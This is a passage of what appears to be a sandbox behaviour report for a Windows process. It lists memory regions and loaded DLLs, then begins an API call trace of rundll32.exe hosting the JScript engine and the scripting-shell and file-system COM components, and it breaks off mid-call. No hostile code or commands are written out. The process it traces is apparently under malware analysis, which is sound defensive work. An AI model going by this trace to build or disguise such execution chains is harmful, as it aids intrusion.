0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 262 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 263 start_va = 0x77260000 end_va = 0x7737efff entry_point = 0x77260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 264 start_va = 0x7fefd630000 end_va = 0x7fefd69afff entry_point = 0x7fefd630000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 265 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 266 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 267 start_va = 0x77160000 end_va = 0x77259fff entry_point = 0x77160000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 268 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 269 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 270 start_va = 0x7fefd6f0000 end_va = 0x7fefd706fff entry_point = 0x7fefd6f0000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 271 start_va = 0x7fefd710000 end_va = 0x7fefd776fff entry_point = 0x7fefd710000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 272 start_va = 0x7feff2c0000 end_va = 0x7feff35efff entry_point = 0x7feff2c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 273 start_va = 0x7feff490000 end_va = 0x7feff49dfff entry_point = 0x7feff490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 274 start_va = 0x7feff520000 end_va = 0x7feff5e8fff entry_point = 0x7feff520000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 275 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 276 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 277 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 278 start_va = 0x7fefea40000 end_va = 0x7fefea6dfff entry_point = 0x7fefea40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 279 start_va = 0x7fefecd0000 end_va = 0x7fefedd8fff entry_point = 0x7fefecd0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 280 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 281 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 282 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 283 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 284 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 285 start_va = 0x750000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 286 start_va = 0x1b50000 end_va = 0x1e92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 287 start_va = 0x1f70000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 288 start_va = 0x77540000 end_va = 0x77546fff entry_point = 0x77540000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 289 start_va = 0x7fef2d10000 end_va = 0x7fef35a7fff entry_point = 0x7fef2d10000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 290 start_va = 0x7fef6a80000 end_va = 0x7fef6abafff entry_point = 0x7fef6a80000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 291 start_va = 0x7fefc490000 end_va = 0x7fefc49bfff entry_point = 0x7fefc490000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 292 start_va = 0x7fefd370000 end_va = 0x7fefd37efff entry_point = 0x7fefd370000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 293 start_va = 0x7fefd420000 end_va = 0x7fefd586fff entry_point = 0x7fefd420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 294 start_va = 0x7fefe830000 end_va = 0x7fefea32fff entry_point = 0x7fefe830000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 295 start_va = 0x7fefea70000 end_va = 0x7fefecc8fff entry_point = 0x7fefea70000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 296 start_va = 0x7fefede0000 end_va = 0x7fefeeb6fff entry_point = 0x7fefede0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 297 start_va = 0x7fefef30000 end_va = 0x7feff00afff entry_point = 0x7fefef30000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 298 start_va = 0x7feff010000 end_va = 0x7feff187fff entry_point = 0x7feff010000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 299 start_va = 0x7feff190000 end_va = 0x7feff2bcfff entry_point = 0x7feff190000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 300 start_va = 0x7feff360000 end_va = 0x7feff489fff entry_point = 0x7feff360000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 301 start_va = 0x7feff5f0000 end_va = 0x7feff60efff entry_point = 0x7feff5f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 302 start_va = 0x7feff610000 end_va = 0x7feff680fff entry_point = 0x7feff610000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 303 start_va = 0x7fefd1c0000 end_va = 0x7fefd1cefff entry_point = 0x7fefd1c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 304 start_va = 0x2050000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 305 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 306 start_va = 0x7fefeed0000 end_va = 0x7fefef21fff entry_point = 0x7fefeed0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 307 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 308 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 309 start_va = 0x7fefbc20000 end_va = 0x7fefbc75fff entry_point = 0x7fefbc20000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 310 start_va = 0x2140000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 311 start_va = 0x21c0000 end_va = 0x229efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 312 start_va = 0x7fefb7f0000 end_va = 0x7fefb807fff entry_point = 0x7fefb7f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 313 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 314 start_va = 0x22a0000 end_va = 0x256efff entry_point = 0x22a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 315 start_va = 0x7fefe6f0000 end_va = 0x7fefe788fff entry_point = 0x7fefe6f0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 316 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 317 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 318 start_va = 0x7fefbe00000 end_va = 0x7fefbff3fff entry_point = 0x7fefbe00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 319 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 320 start_va = 0x7fefd190000 end_va = 0x7fefd1b4fff entry_point = 0x7fefd190000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 321 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 322 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 323 start_va = 0x2590000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 324 start_va = 0x7fef5ab0000 end_va = 0x7fef5abdfff entry_point = 0x7fef5ab0000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 325 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 326 start_va = 0x320000 end_va = 0x320fff entry_point = 0x320000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 327 start_va = 0x2610000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 328 start_va = 0x7fef46d0000 end_va = 0x7fef4723fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 329 start_va = 0x1ea0000 end_va = 0x1ea0fff entry_point = 0x1ea0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 330 start_va = 0x1ed0000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 331 start_va = 0x7fefcbc0000 end_va = 0x7fefcbd6fff entry_point = 0x7fefcbc0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 332 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 333 start_va = 0x7fefc8c0000 end_va = 0x7fefc906fff entry_point = 0x7fefc8c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 334 start_va = 0x7fefd2b0000 end_va = 0x7fefd2c3fff entry_point = 0x7fefd2b0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 335 start_va = 0x27d0000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 336 start_va = 0x2850000 end_va = 0x28cffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 337 start_va = 0x7fefd1d0000 end_va = 0x7fefd260fff entry_point = 0x7fefd1d0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 338 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 339 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 340 start_va = 0x28d0000 end_va = 0x2cc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028d0000" filename = "" Region: id = 341 start_va = 0x7fef3bc0000 end_va = 0x7fef3ca2fff entry_point = 0x7fef3bc0000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 342 start_va = 0x7fef4730000 end_va = 0x7fef52e6fff entry_point = 0x7fef4730000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 343 start_va = 0x7fef42a0000 end_va = 0x7fef42c7fff entry_point = 0x7fef42a0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 344 start_va = 0x7fefa550000 end_va = 0x7fefa567fff entry_point = 0x7fefa550000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 345 start_va = 0x7fefd780000 end_va = 0x7fefe507fff entry_point = 0x7fefd780000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 346 start_va = 0x7fef3e70000 end_va = 0x7fef3ea3fff entry_point = 0x7fef3e70000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 347 start_va = 0x1eb0000 end_va = 0x1ec3fff entry_point = 0x1eb1070 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 348 start_va = 0x2cd0000 end_va = 0x3886fff entry_point = 0x2cd1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 349 start_va = 0x1f50000 end_va = 0x1f51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 350 start_va = 0x3890000 end_va = 0x398ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 351 start_va = 0x1eb0000 end_va = 0x1ec3fff entry_point = 0x1eb1070 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 352 start_va = 0x1f60000 end_va = 0x1f6ffff entry_point = 0x1f61064 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 353 start_va = 0x1ff0000 end_va = 0x1ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 354 start_va = 0x7fefbc80000 end_va = 0x7fefbdabfff entry_point = 0x7fefbc80000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 355 start_va = 0x2000000 end_va = 0x2001fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002000000" filename = "" Region: id = 356 start_va = 0x2010000 end_va = 0x2013fff entry_point = 0x2010000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 357 start_va = 0x2020000 end_va = 0x204ffff entry_point = 0x2020000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000010.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db") Region: id = 358 start_va = 0x20d0000 end_va = 0x20d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020d0000" filename = "" Region: id = 359 start_va = 0x3990000 end_va = 0x3a90fff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 360 start_va = 0x3990000 end_va = 0x3a90fff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 361 start_va = 0x3990000 end_va = 0x3a90fff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 362 start_va = 0x7fefd2d0000 end_va = 0x7fefd2defff entry_point = 0x7fefd2d0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 363 start_va = 0x2010000 end_va = 0x2013fff entry_point = 0x2010000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 364 start_va = 0x20e0000 end_va = 0x210ffff entry_point = 0x20e0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 365 start_va = 0x2110000 end_va = 0x2113fff entry_point = 0x2110000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 366 start_va = 0x2710000 end_va = 0x2775fff entry_point = 0x2710000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 367 start_va = 0x7fefd380000 end_va = 0x7fefd3b5fff entry_point = 0x7fefd380000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 368 start_va = 0x7fefd3c0000 end_va = 0x7fefd3d9fff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 369 start_va = 0x7fefe510000 end_va = 0x7fefe6e6fff entry_point = 0x7fefe510000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 679 start_va = 0x3a10000 end_va = 0x3a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 680 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Thread: id = 3 os_tid = 0xa40 [0037.825] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d4c0 | out: lpSystemTimeAsFileTime=0x18d4c0*(dwLowDateTime=0x7994bde0, dwHighDateTime=0x1d31a96)) [0037.825] GetCurrentProcessId () returned 0xa3c [0037.825] GetCurrentThreadId () returned 0xa40 [0037.825] GetTickCount () returned 0x119f5 [0037.825] QueryPerformanceCounter (in: lpPerformanceCount=0x18d4c8 | out: lpPerformanceCount=0x18d4c8*=283753551) returned 1 [0037.826] __dllonexit () returned 0x7fef3c00728 [0037.835] __dllonexit () returned 0x7fef3c00780 [0037.835] __dllonexit () returned 0x7fef3c00750 [0037.836] __dllonexit () returned 0x7fef3c007b0 [0037.836] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefef30000 [0037.839] GetProcAddress (hModule=0x7fefef30000, lpProcName="RegisterTraceGuidsA") returned 0x7739f570 [0037.839] EtwRegisterTraceGuidsA () returned 0x0 [0037.839] EtwRegisterTraceGuidsA () returned 0x0 [0037.839] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d0b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe")) returned 0x20 [0037.840] GetProcAddress (hModule=0x7fefef30000, lpProcName="RegOpenKeyExA") returned 0x7fefef4b5f0 [0037.840] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x18d218 | out: phkResult=0x18d218*=0x0) returned 0x2 [0037.842] GetVersion () returned 0x1db10106 [0037.845] GetUserDefaultLCID () returned 0x409 [0037.845] GetACP () returned 0x4e4 [0037.846] GetCurrentThreadId () returned 0xa40 [0037.846] GetCurrentThreadId () returned 0xa40 [0037.846] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f068 | out: phkResult=0x18f068*=0x1fc) returned 0x0 [0037.846] GetProcAddress (hModule=0x7fefef30000, lpProcName="RegQueryValueExA") returned 0x7fefef4c480 [0037.846] RegQueryValueExA (in: hKey=0x1fc, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x18f060, lpData=0x18f058, lpcbData=0x18f050*=0x4 | out: lpType=0x18f060*=0x4, lpData=0x18f058*=0x1, lpcbData=0x18f050*=0x4) returned 0x0 [0037.846] GetProcAddress (hModule=0x7fefef30000, lpProcName="RegCloseKey") returned 0x7fefef50710 [0037.846] RegCloseKey (hKey=0x1fc) returned 0x0 [0037.846] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe830000 [0037.847] GetProcAddress (hModule=0x7fefe830000, lpProcName="CoGetObjectContext") returned 0x7fefe84c920 [0037.847] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe830000 [0037.847] GetProcAddress (hModule=0x7fefe830000, lpProcName="CoCreateInstance") returned 0x7fefe857490 [0037.847] CoCreateInstance (in: rclsid=0x7fef3c6cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef3c6cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f030 | out: ppv=0x18f030*=0x7fefea0a1b0) returned 0x0 [0037.847] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18eff0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0037.847] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0037.847] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f090, cchData=6 | out: lpLCData="1252") returned 5 [0037.847] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.848] CoCreateInstance (in: rclsid=0x7fef3c65d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef3c65d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2cb660 | out: ppv=0x2cb660*=0x3a56e0) returned 0x0 [0037.848] IUnknown:AddRef (This=0x3a56e0) returned 0x2 [0037.848] GetCurrentProcessId () returned 0xa3c [0037.848] GetCurrentThreadId () returned 0xa40 [0037.848] GetTickCount () returned 0x11a05 [0037.848] ISystemDebugEventFire:BeginSession (This=0x3a56e0, guidSourceID=0x7fef3c65da8, strSessionName="JScript:00002620:00002624:18072197") returned 0x0 [0037.848] GetCurrentThreadId () returned 0xa40 [0037.848] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f030 | out: ppv=0x18f030*=0x36ab70) returned 0x0 [0037.851] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefea0a1b0, pUnk=0x2cbce0, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x2cbd18 | out: pdwCookie=0x2cbd18*=0x100) returned 0x0 [0037.851] IUnknown:QueryInterface (in: This=0x2cbce0, riid=0x7fefe9dd1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ee68 | out: ppvObject=0x18ee68*=0x0) returned 0x80004002 [0037.852] IUnknown:QueryInterface (in: This=0x2cbce0, riid=0x7fefe9b6f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 